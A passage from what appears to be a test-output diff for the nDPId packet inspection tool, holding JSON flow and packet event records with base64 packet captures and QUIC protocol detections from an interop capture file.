8ujmnBp2XTNKpRpO15gBPf\/xmmYsn0LfjAGybSTVfzGe+r9+hhk9FRKWlvSa0mUhD5xcSPxL855ekaVs8es5YbbQJzvgyO0E6jlhqBvBuXAFk7V5bJfYUhuvK7+FV\/vqBa5Dyr1Y4aVAg8uqmcbLqzdH2nG4UUlIo5QS\/5YbcbMVH8iRLcVUqSgPI65pQT1eOh5NtpZaGNEaXfSjJtIcZtks1c9UmuF5RZk5R8RQDxMBmTUIHRWRrWAtXGorI1rYK3OSEHdlNwZLgl\/WhBsg8pHYuSYaJpYetojCp9wSrshudt2xxyszjnmuhkGDIm7Y\/wjwl1afYHDK3hktBEZRnZVWPJaRHBs4awP9h7+ogQbF1JHMgqJ8UHjilyfki+6fs4+HR4\/6MD0nR2lO00THBaPUZEBIBanL39bTcfHJv9V2bghWT79XrP3UcYoKelpB\/ItWidO0yq9fm+CHlz9Et4Ou\/1QyXDWEp+CTMyrOG3vgDdsY85\/lqem3Pk\/TK14Hvru6JNyjBX1qQfwbZ88ltbaToG0yqFOgs2W5Arx9\/dI4Ztfqsjc+585hIsoYnSoLWOXcSri0SP6dHTiXrSLkzfw516ezxXVHyVqjVj05mTnGg6pkVppsXFLKXFlWA1e1ekM\/7pIK3mEFd1m5zAsBvdRI8t0eAjdE\/YqRjTOBuVa2i4QrjzAhkilSHIU4wsKR0bJYrKvlvC6aSvyiIhDJ8TTHnME5NeWT+7GBlVwsE5DxirVv\/piW3kABvaCjRWG\/FT17E9VSZ46Bt\/YDK2K++WfWexMUmiclj\/iNE0u\/2Uu2FqhLdisuC4yPh1npFfTyVb5gd0sFzCfXeCse35OuC0BYyIPm6NlvuaZqtz3phwQTaixo2zFFiJEmFvvuAA7ELwFzzKc41TRB1+kry45l3KOpElwYbMgfd36GZXpWYtuP6E52jGg5RtuhyBlrf788aBNf8sLkyM9xE9KcxBb5QVeJTjT+LcWZdWa+v3KGsrLCPyrX+kiGauCjQ+hs82UiUqVf9Rz3JFbGEwZgYlj7I14qfs\/YcVCcwnxGzpddMNKdr0ra2x1StoIrJ0raVEvvwlSDr+tCYZpUpOYxl90g6gsdiN7MJw2E9wvBWEpyPijuZ0KwxzCd0EAOuXWQRRPgW+xa5IDUzZpOTbVEZnGiINxr7hy0M4cxGp7iAIcmRBu08GCRc89HtXVlh4Lj0ClSbZKBKbo7me+xDowYARa7U5sl5\/iHaXVCKJtSB5\/MjfywY1OM6Rrb\/rUovA=="} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1603816434523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434523,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUASTxAAEARQtzAqAGAKHC\/PLXwEVEE7Eu5ywoKCgoIUh1YuhDqcyAAAETShcZ7U61m3r3pKDSZMAlRkEkMX8IBatc2KSsG3VEj0lAsPYd+5xEo7F0R6rRII91EQq3kY6fRBVYjgUzkelUep6PIw4v1uOUHWVWj9\/CBoCuFmh0QBFTlwFV3ajZYJtEVj\/UMbkT8ggH6NbKSJV7\/7XCOY6sOXc7KO1y3bpcq5D78RQTF3QAnMEYSTjEkBHANDD5W9AIyB1dmHqwExvOJV7YrCF0Wz7pCUTi8XP9KFNvgkhOSPVQjF1KeCLRKAL3ZHtPolipZhKCqRtuCyeyoz\/WKMUWuH2pOJ\/WCN+fIaYqYSu2\/Uw9h6SGQoS6DN0anGtpDnUD0GFob1uYgJfvGsEIlEF4ovhbxwTVp7mrf8Jn1RwQU6cEaGVAGxcwFRF59HEd7DfQ2HqiN6ygOPpQYa4cx7qpW5pucG8spbD1\/cWsvhbhGqD8WXrUrT5FX8eR51cu5\/rSEZZ0hJlrQrcyu1Jo+wtEU248WCYzmcFDU3KkwLTXrWInL3I4\/3lLpKWAzyz04l7KeGoqcwCeKKQ6p1uyWxpMWebh\/pAeZzwZIk8uY57nKlrPOmivZENHW9oA7\/VrJHghXWWSPNWv94zdJtPbS4kaRkkyKA6YWscg88+FeMvb1pCnByg\/FBd8Mkh8FAhvUPdRBKBqvfa6hdS6kOEBzLUDEht1P\/hkx2oxe0tO1cCFKrfKPAgjP7fDs+HjYwYUjQcQs0Lrfeiezhk68WlVN7f3ydw4AyGklyENZMzjbp2KCDTQJw+bwFV8oeqGfVQRe12vWjCN19ZIAet6\/7N00iAsSHL0OYmwIy5kEm9ia7W54BjwDLqYTIVS2lLjOBW8eRTghxgSgQxvjGDeszyBcMdQvXcIFvNEPXDZvspUbePIw91S9T7A3jCp65i7X4r+fn3M7N5F7j58fappJzU95USbFKUMdxds5siewsczbT\/MrC2OkG0+JuLsutjVwruC3oxgf0F68j+vl1Wm0rJIMkpipHqVvhcHhV+OWaqezJa4AMHRf7fdSrYwPxKtdQTJG3\/g7anjqxa6WSX99h5LjVhbxHDD361DVddXanfGMVBhF7hsyy9ONqBFaE0X3vq+HEhBWkG9LtGG68wwwE5NwZds\/5HESH+ia5Ow\/sbVAD5094mw+zs9a70KyvM0z2kZ8P5B1wNaZ7JZ67KSZOdP\/DCz7bP9r0i+DKzjU4mo1fhcDYTbnyYL09iH+yrFC4uLIRq1vlDgFJ2X2xDITqMN6kx\/ZziHpUw0+tusqXNSXNMQMFKUZKnReB3GpZaA4xILTO73fVG7kLqQ2j9Pfhgr0XjkpujIdWgbDJPwVi0egmLmvkiBx2oWjN0pYUqFfvKMLMSROetLN33mIJ7WaM6DIBHm0ZoNLBntXqK2QERM+5VXgRG\/zKfBTkTfngbP7Dw38e4JcE1olS6CghzCOQzrj\/EPi9cO\/THKUsaoFe7VwubEl6zVajKWO\/ftqXQDEtcPyWqS1x9VkXgf+5HCH6y4ZfXz8j0oj\/gEliPbSFZd61V\/W+k+69wJ4Ve8CztvjyEeitwZuhoIUutC7Co\/agYewJuOHM9M9SEui8BMgVWEjqOMxUGgxy\/aNH+S0wwqZxbtmcgxtt\/+dU8H1VYtjo5PU7ihOGqkqbFa6tDbR7MCwkw=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1603816434524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434524,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgmJAAEARCbbAqAGAKHC\/PLT+AbsE7KwIwQoKCgoIe34skUb\/aLsAAETSb8uSUd6EB7gNq4gf6KDxkhY+y87q3CLci6x1EsNvv80WGJPIpKwhzC8+vg4NXuO4unafv2NMJkJjRI6OL98YRtdvYGXB+F3JwCowCuwGqw6jTxikMXRPpRCAgRKO5X\/KxcEwJRdTBT2rlOzU+hO0yWkEtT4rCwTG1V9X6PEAkb8zWYSIsTTFWdbuo8+Hsr3EHPqfyeXbsSzOoMiqiG28CC1UB7fjZJ0W3T0asAlOYWGl8MIKuqHYSMDCaz5\/KR7GxLTjjCeuvA71YVTfkU0Gf1f4xW0HKl3ycj89fZPIImHw1dOmlLMZdNJPHN3oMEV1WzgH15lz2HPaXv7a5Th+I9CCo7LropS0BbFADYctmnMsqGggv3K7uKbyNnulVBXm7b\/tIGeDPKbxhMVyVFX\/OFstaFoYOfWt41Qv0Uz+5xguURoeuY7TUkuJQ2TlXG1IxX6EbnM98toW72ernv2vm8GcA06P94MCodt6GnFnJdalXwd3Z0Zgu8r3434Yhg444uk2HEryaQG3hHsq9RRP13JfK3yZ+q3HWXP97pXxl06amatIARReotx2af2MAxWD4J\/9LErkYyTqlEr6EnBC+7r1cV9IP3w6nfwYEb0VMSsQMzOKiqBofCNQtvNgMmkH5GMWZlDP0T3k9d+0l3FMevNqVwb+iznRosmDKbOnAOsNl2nNjXZYQXWhQqAThjmx79k1nVXVH\/HuAezLxegqma45cG67rPyGRqN3q1h5El6PYgtdZyE5yz+oVR6XOIkyz168X\/Rv7t73N+i0n+IFHPvHuQ+EK3e1BGUIifpyEElK5RsbL4HGjtaWcevK45MDQ3axvbDUEW\/w2lJrfPlXa\/XZ94sTcZvgd9dy1K9MAJdUT1E0ufvAhjda4LLkNYkdVZjhePaG\/OIP0+\/2yjL6i\/866d9NM8o49WaX\/O9Pd296qB4TZaRNaKuBx+CTsP+biUuW\/9YibPEOQBdFkjBprbbH1nXMOpEF6QqyTSSWy1mOqWI7NTc8ioxMC\/07KPAh6S5NvmgDw9rb7lm4u9afeFEO\/2Y2F04NKOOTYQjedcDqmY1izosf6wgBTRlHezP6uNhrQcmJzYaSn3Fg99mguDGzeymhTX46iCjpPSI\/wUScS13iOhxccWK+52NCIsSS1ArhMq7x5GIHJngmyLap8JYRZLzZek50uDc+cvlWv5aWpLq4oeFbzb2UpThvb0S8TbvXwHNE0GcN9NQ47Cz0xMuSlHF7VEKoW\/ldk\/T1mzEivHu6X4HhGg8NuDcJj6aZIVaJae1NxSt5gLl8MTFDp8u0m2DXTpjwFCV3AX\/hN8OLAAu3WZ+A6sHLc1Laby2OYoClrb6PAbfK8O93b7DnY1GdxskJ1zN2DGmXMfzpZYEvO6KwGvo9tWt5MopqXQ2LZWUoyLrLoGDkaMoRzTKI\/QFULy6GKZQuGdZK8BHoqiDwJoTG\/iTyF1KYSQbibwt0sOyty8uw9tMbzTSnr+UrS3c6KjbJG3GNT+Hel2hrgKBCTL1FLUatdsWvxb3xr1uQGvayWgC4e8BQxZ9J4DVcI4Jl9RFSGru0ncBQHVlkznYPLGR5hwEuTrIrbhESI0fIBtr8gRxzc5NuTahe+uchbMgzGi7qkmDsOQtGYpMw30QbIQ=="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1603816434528,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434528,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA5QJAAEAR53bAqAGAyu7cXJXeEVEE7LxswgoKCgoIN5KvB9nft6kAAETSHGVijjeaIj19wFPg1eU29TK6pHOMAuBm7PlkQXCoUAkcIsjKIox6Tem8bVN8W3P7l09wyVGafUKmNhonG2+PLUPwJedoIYbfaArvK\/RuwZUPJBHiPqclPj8GB4blfNLZCSxE7O80ZWg6IzmaH0ZyK96aL8u3DeLpkwvE+ZiYmPNHLkxCubDvJZKErdDSCNct\/8C0DNjLgLDA2edu7gd5la5GmHjIWyqKCsVDNCJZblHcVBL1VdA06pyamhaIutlHrJtt4MwRHnHaWsi4xtJmIF21kHBkIHdSNDwPpZdZQOo6t6Itpq1ZTpS7VN39q1L5s9axaQwh1msQpQnvxEMKRTjphoLon2C14B0FHuQO+nIydxdhsWr7CdUuXtsSSSuwWO4Ld68XCiQx9y1eBiBAB+GD2Wu\/lb9XwLxv5IssYnU4s6tBvuesFaIcboSu0qDauY6CaPlOVzIvtAJYMstwHjBjgOUg1VLVbW4e8RABqYyrAFgk1Y\/+PtHf\/PYsvCZhOCB5kqbImiRw3h1pD67YavEoB32fyii0nqrXhuOx80OsYd19rZfvwepXx7rsTO7Azrv1gfJUNVyN3GZFPVbu+9bah0bZVb2faEbPsXvHVJ7ADhVuYKBowG3\/vToH88gOsc5MmMiA7BPkeocUuJbep7qVkWVyD6A4XDSMgQOf4snKf3NMnwoOZ5+\/oEP35GdTw+gaNQtPml2DoGyADmvPE2GySCNdXh6kRDEzP1eIDWJ6cblFsWZLk3HJxSVWVK4L5nGv7G236HRvH7cao3OofLUezX5EJcTnlNBjPkG2QPEEcNrUyzgTzeskCKdHWBppAIz5V7d5Rm9KbgwRKyHgP52XfTCa9HE6G\/aWYw8rvnpb3BVO7AuVUTIl+JadVGBMO6HP9MQda7QUWFv6MTUs4VpAGaDAJWfobOxRrmQWeu9NDR0bYEXNNAf7RSIcYCgEjVOU9A87EHcp5jWmc9mASoXlXUjhMutb4712Z6btK9v5ePztTnZNKvllfQgWfQ0YcDu+IovA\/LzcmwpJeiamvlR4aeRi4IENGOnyfwZ+m2LklN5Vs3C\/uAPp9drDmngkL4hb+R4z1IEA0ohBJXoQ+GkgXZ77qbe6ISLXHCPXiKNO4b82HpsRurSda+ao+RM0sD0EiMBh\/TCkxcIcAIltsz8QoSaYF1MGi8GOXIhmTX1jWZrLAHyJmPKC9EuNW9neoG9EJZ+dIX5mFx0oGGaw2sdFPwhkPFTtqOk5AWokoPIwvT5vd4Sa519tHm6athzsvpY\/qhpMhYMBhIn+Ia+ZLRy9h52056DhP7uVx2GyT9ovjnsPolXuMkxrgw2OIdEvaKHwHSLmDh1euVdBDmyBUwspPiAOjuWMEDE13npg368409PBTQTw048QeZ\/V36AB8RGBYvtIGfzBKjh7cAm8l7WE9s5UvaZQy873oVec7lmimiZyEb5LyxRSzZWjXpzMqWJZuYCs9SpKSXnfZSSdiAHAKhypk11NUGFwk3vS\/I5fWfsFxUM+Rlf7z6obYtc9UnzwhZEp+DuRwFp0SSRdY9xJC2al7618o0Fetdd+n5VB8cJhD79oCRxpjuJClhZScv8yRHXQ2tWyL8V5prewYS8GgYGe0z2ZOFSP2ZvQeX70ng=="} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01188{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1603816434530,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434530,"pkt":"PKn0qB\/spJGxgjQ5CABFwAJA69kAACYB7ksDefI2wKgBgAMDt3gAAAAARQAFALRdQAAhEei3wKgBgAN58ja3ogG7BOzsKsYKCgoKCHUJ14NKwS2PAABE0nUjXqgo3Pq+h\/Bzi9p31\/TZeG7dv7XIf5N1hruOb+rMEEShGYweXC+T8EETUns4xE1pcJfcd9QxJWLz4mk48BM1d7sz6D0g90Q7A6DSDnSX8zPHnk\/mBfB7WcT8ZfCXzHAFhGGnFcwiEQYipESmQ6UeXUdKLkbZVdxhnu5LdA7U8ofrC97xC4VdpB8+pct9Ef44k+OzR1LZByriJ678sYxqlbwGB9+J+7VwgUOg\/gH2R9dX6bQQUO7rTCoyUHrYGZ5osp+I31JLOOQ0C6bZs5jO72nIFTNVF37w0TIl1hS5YHNmjLHkXmrNxza9D1NWHtYItabi0jdmvYKXEW\/jtGDBbNI5Spt\/DdSwahkwacog7vEBAslclMpeaBEdIll7ht0275DdkEE5wCpSaptHi1ZfzWLt8\/3zVoN9gllA09tedp3dfnrCs3MbxDshoV7lFoWGdn\/dNMr60Cx3AUMtm2P3NvJ\/wl+FPKcSOjciGrJox3eMTCqBEuAzJo0ymq8aqrjO3V0G12SwfBJ9tJCn3UEWBx4Pq3qlqktq2\/Fy+CDEiIPPlLGrnjA5s631GXf+eke3F40ZavlVJrfNauZzZygjAUP+676+Kjhjmdgh5vVfrgA0zW4b73tJevIq4He558UKRJU4CMox8hYb3fCj6C3dh7FjwxE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434530,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.594034} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434535,"flow_last_seen":1603816434535,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434535,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1603816434535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434535,"pkt":"pJGxgjQ5PKn0qB\/sht1gAJBbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmgL0RUQTYhUTOCgoKCggKh53oSKcUIwAARL7ptyuGj3sWoCfzmGYT9c5knffzFTiJ5lVJXbpctUGbKL5ySK19+FWpax4\/nAYQUfvCM\/bhsgFtS9G+ZFtPXpli7k9OwELHwQ20mBGQWbjmI7hP6morZpTeRWxaKack+BC0iQiX9\/LIrfrGdoT1oDoUDperL3\/EWfbsAzs51Fr37OKsXNxMOnNCWganJYQDoS1NHvgUii8j2RT7vFE3V9d23tm2baG7XTpJE\/KumpBsVLcT3VzQxufgdMiVwmhOfmQTPXaJDGA\/jRTiFeXg7nXwXEtAxzBQgrLuBhQxPykcUp0c2\/phwIU04regmPrsDteoZwKZzuohFTkgaiJgBEO37GhILvwwBeV77OMpz83mtpaFJrhJUhOB5vM0\/RgcMPtcx4bSZUJUYD6nBLhQJ\/GvQEu7UlOsfkiIr